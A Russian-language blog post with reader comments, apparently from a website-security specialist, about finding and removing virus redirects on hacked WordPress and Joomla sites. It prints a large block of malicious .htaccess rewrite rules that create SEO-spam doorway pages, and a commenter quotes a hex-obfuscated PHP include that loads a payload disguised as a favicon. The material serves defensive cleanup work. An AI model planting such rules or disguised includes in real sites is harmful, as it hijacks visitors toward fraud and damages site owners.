Никакой владелец сайта не захочет, чтобы траффик с его сайта уходил через редирект к неизвестным сайтам - это неинтересно как клиентам, подрывает доверие покупателей и вызывает санкции поисковых систем и антивирусов.
В данной статье я рассмотрю основные варианты встраивания вирусных редиректов.
Внимание! Удаляя редирект, Вы удаляете лишь следстствие, для того, чтобы ситуация не повторилась, Вам стоит искать причину попадания вирусов на сайт!
Кроме этого, вредоносные редиректы плохо детектируются сканерами и антивирусами, что зачастую приходится искать вручную источник зла.
В первую очередь ищем вставки кода в файлы .htaccess, особенно в корне сайта
Все что связано с Rewrite стоит проверить, куда перенаправляет.
Ниже я приведу пару вредоносных вставок - которые создают дорвеи и тысячи страниц в поиске, так называемый японский спам (сео-спам, страницы с иероглифами - тут много названий):
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)F%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%([^\d\/]+)(.*)%(.*)[0-9]+%(.*)[0-9]+%(.*)(.*)%([^\d\/]+)F%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%(.*)[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%(.*)(.*)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+F%(.*)F%(.*)[0-9]+%[0-9]+%([^\d\/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%[0-9]+\/.*..*$ ?$65$39=$62&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*-.*-F.*-([^\d\/]+).*-[0-9]+..*$ ?$7$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)([0-9]+)%[0-9]+([0-9]+)[0-9]+%[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)-.*-[0-9]+..*$ ?$15$1=$14&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+.*[0-9]+..*$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*[0-9]+N.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+.*[0-9]+F.*W[0-9]+.*[0-9]+.*F[0-9]+ZW.*HR.*(.*)--$ ?$2$10=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*([0-9]+).*L[0-9]+N.*YXJ.*HJ.*WF.*[0-9]+.*Y[0-9]+.*(.*).*R.*Y.*V.*[0-9]+Q.*$ ?$2$1=$4&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*([0-9]+).*L[0-9]+.*[0-9]+.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+-$ ?$2$8=$4&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*F[0-9]+ZW.*WF.*[0-9]+.*Y[0-9]+.*(.*).*ZG[0-9]+.*ZXN[0-9]+.*WN.*ZH(.*).*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)$ ?$36$1=$35&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+$ ?$1$3=$4&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*-.*%[0-9]+F$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-[0-9]+-.*-.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)_[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-[0-9]+-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+-.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)-.*-V.*%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)-[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*&.*=.*\:\/.*-[0-9]+..*\/.*-.*-.*-.*-.*-.*\/&.*=[0-9]+K([^\d\/]+)&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=.*\:\/.*[0-9]+..*..*..*\/.*\?.*=OIP.(.*).*U.*[0-9]+.*([0-9]+).*U.*[0-9]+.*[0-9]+V[0-9]+.*Q(.*).*([0-9]+).*&.*=[0-9]+.[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*$ ?$148$146=$147&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)&.*=[0-9]+&.*=[0-9]+$ ?$11$1=$10&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/.*-.*\/[0-9]+\/.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/.*\/[0-9]+\/$ ?$36$1=$35&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+\/$ ?$1$3=$4&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-.*-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+.*[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*\/.*\/[0-9]+\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)&.*=-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)&.*=[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*\/$ ?$1$3=$4&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/$ ?$15$1=$14&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/$ ?$36$1=$35&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*\/\?.*=[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
Если увидите что-то подобное - смело можно удалять, если сомневаетесь, какие строки можно оставить, то возьмите стандартный файл вашей CMS - там не будет находиться вирус!
Обычно редиректы прописывают для запросов с мобильных и планшетов:
android|plucker|pocket|psp|symbian|treo|vodafone|wap и другие вариации мобильных заголовков
как и для переходов с поисковых систем:
yandex|google|mail|rambler|vk.com
Если этот пункт не помог, то стоит обратить внимание на код страницы - порой часто редирект добавляют через Javascript
Чтобы избавиться от вредоносного кода может понадобиться массовая замена всех .js файлов.
Обязательно проверяйте индексные файлы и папку шаблона - это излюбленные места хакеров для вирусов. Особенно тщательно пройдитесь по файлам index.php, footer.php, head.php, header.php - в последнее время популярно стало размещать сами вирусы не в них, а в виде ссылок. Поэтому внимательно проверяйте, какие файлы подгружаются посредством команд include и require.
Самые изощренные вставки делаются уже в подгружаемые модули, плагины и компоненты. Это могут быть как отдельно внедренные модули (особенно если была взломана админка), так и просто вставки зашифрованного кода в файлы известных и популярных расширений.
К примеру, в последнее время встречаю не один сайт на джумле ( в частности на Joomla 2.5), где по пути includes/inc.class.php находится сам вирус, а в файл application.php в этой же папке вставлена следующая строка
require_once($_SERVER["DOCUMENT_ROOT"]."/includes/inc.class.php");
Обычно параллельно с этим libraries/joomla/appplication находится вирус редиректа с именем joomla-app.php
В любом случае, если заметили на сайте перенаправление на сторонний сайт, то обязательно стоит предпринять меры безопасности и проверять весь сайт. Если сами не можете справитья, то обязательно стоит обратиться к специалистам по удалению вирусов и защите сайтов.
«@include «\x2fho\x73ti\x 6eg/\x74eh\x6eo h\x65l/\……и т.д.»
как вы думаете. это вирус?
Перенаправление идут на другие сайты и не могу найти где эта зараза сидит. Сайт на WP
В самую первую очередь проверяйте файлы шаблона и wp-blog-header. php
Извиняюсь, а Вы не знаете, как можно раскодировать этот код и посмотреть, что было там прописано? Хочу узнать на какие файлы он ссылается еще
Код:
@include "\x2fho\x73ti\x6eg/\x74eh\x6eoh\x65l/\x64at\x61/w\x77w/\x74eh\x6eoh\x65lp\x2eco\x6d.u\x61/w\x70-i\x6ecl\x75de\x73/R\x65qu\x65st\x73/R\x65sp\x6fns\x65/f\x61vi\x63on\x5f7e\x62f8\x33.i\x63o";
Но мне все равно не понятно, зачем вирусу создавать фавикон и потов размещать на сайте?
Это мой последний вопрос, и так я очень сильно Вам благодарен за потраченное Вами время на меня!
Спасибо! Буду теперь искать каким образом все это туда попало
Еще раз спасибо!
Вы имеете ввиду проверить тему?
Если проверить файлы темы, то там был один лишний файлик "proxi.php".
К файлам темы надо тщательнее отнестись и лучше вручную открыть и просмотреть код, обратить внимание на подключение внешних файлов через include и require
не подскажите что это за папка
aiowps_backups
вот полный путь до папки
wp-content/aiowps_backups
там три файла
.htaccess
.htaccess.backup
index.html
в файле .htaccess
order deny,allow
deny from all
в файле .htaccess.backup
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILEN AME} !-f
RewriteCond %{REQUEST_FILEN AME} !-d
RewriteRule . /index.php [L]
# END WordPress
order allow,deny
deny from all
в файле index.html
там пусто никаких записей нет
Подскажите пожалуйста если можно, что еще можно было бы поставить с связке с
All In One WP Security
какой нибудь сканер, если были изменения в файлах и автоматически сканировал сайт, буквально все что бы можно было бы обезопасить сайт?
Сделать такую связку чтобы они не конфликтовали между собой
Начала заниматься с вордпресс совсем недавно, и как этот движок самый распространенны й то ломают его часто, хотелось бы как сказать во все оружие встретить если что
Вроде бесплатных много есть плагинов, но не ставить же все подряд, чтобы конфликта не было
Если есть мысль было бы хорошо
Насчет крона это не про меня, не настолько понимаю
В любом случае спасибо что подсказали
Пишу из за того что не знаю что уже делать. у меня на сайтах укакой то вирус который делает редирект с них. только в том случае если человек перрвый раз переходит из поисковиков путем нажатия на ссылку ведущую на мой сайт.
- Человек не попадает ко мне а сперва на сайт лохотрон - http://reposted.pro (ранее перенаправляло на pay.wew.ru они сменили домен) смотрите как это происходит - https://youtu.be/JQNkwBtZbX8 на хостинге прошу помощи уже много дней, что то погли выяснить из онлайн поддержки, техническая поддержка отмахивается и помогать не хочет, дескать это не наша проблема.
- Дело в том что эта "зараза" распростроняетс я и на поддомене.
Мы уже все снесли, все конструкторы и установили сайты заново, чистые аккуратно и без вируса, становится понятно что дело не в сайтах, не в их коде, Свои пк Ноутбук проверены разными антивирусами, но все ровно идет редирект, мы выходили специально даже от друзей, где они вообще ни имею отношения к нашим сайтам, но и там все происходит как на ролике выше. остается только один голый домен. помогите пожалуйста решить эту проблему, у меня весь трафик уходит налево, да ладно если бы просто уходил, так он ведет на проверенны лохотрон, люди страдают.
Я уже не сплю долгое время.
Да, и проверял на редирект разными сервисами в сети (бесплатными),
пишет редирект не обнаружен, Но когда проверяли вот этим https://www.revisium.com/ai/
онлай сканером, редирект был выявлен,
вот сам домен - http://joxi.ru/ZrJZYLdi9xOzlr
вот его первый поддомен - http://joxi.ru/MAjxoPbC4NJO6m
второй поддомен - http://joxi.ru/MAjxoPbC4NJK6m (этот совсем свежий, еще не прошла его полная установка) везде один и то же лохотронский сайт.
и так на всех моих сайтах и их поддоменах.
Я точно знаю что дело не в сайтах и не моих ПК.
Дело в самих доменах. Помогите прошу люди решить эту задачу.
У вас проблема в том, что сайты не изолированы друг от друга. Именно поэтому за минуту спокойно перезаражаются остальные сайты. Когда сайты будут разнесены друг от друга, тогда и надо каждый сайт пролечивать и устранять уязвимости.
Вы нашли уязвимость, чтобы утверждать, что проблема в домене?
С чего Вы уверены, что изначально устанавливаете без вируса?
То, что сносили конструкторы, ничего не значит, вариантов попадания вирусов множество - от заражения хостинга до атак по уязвимостям.
Настоятельно рекомендую Вам обратиться к специалистам безопасности на платной основе, если сами не можете справиться с проблемой.
RSS лента комментариев этой записи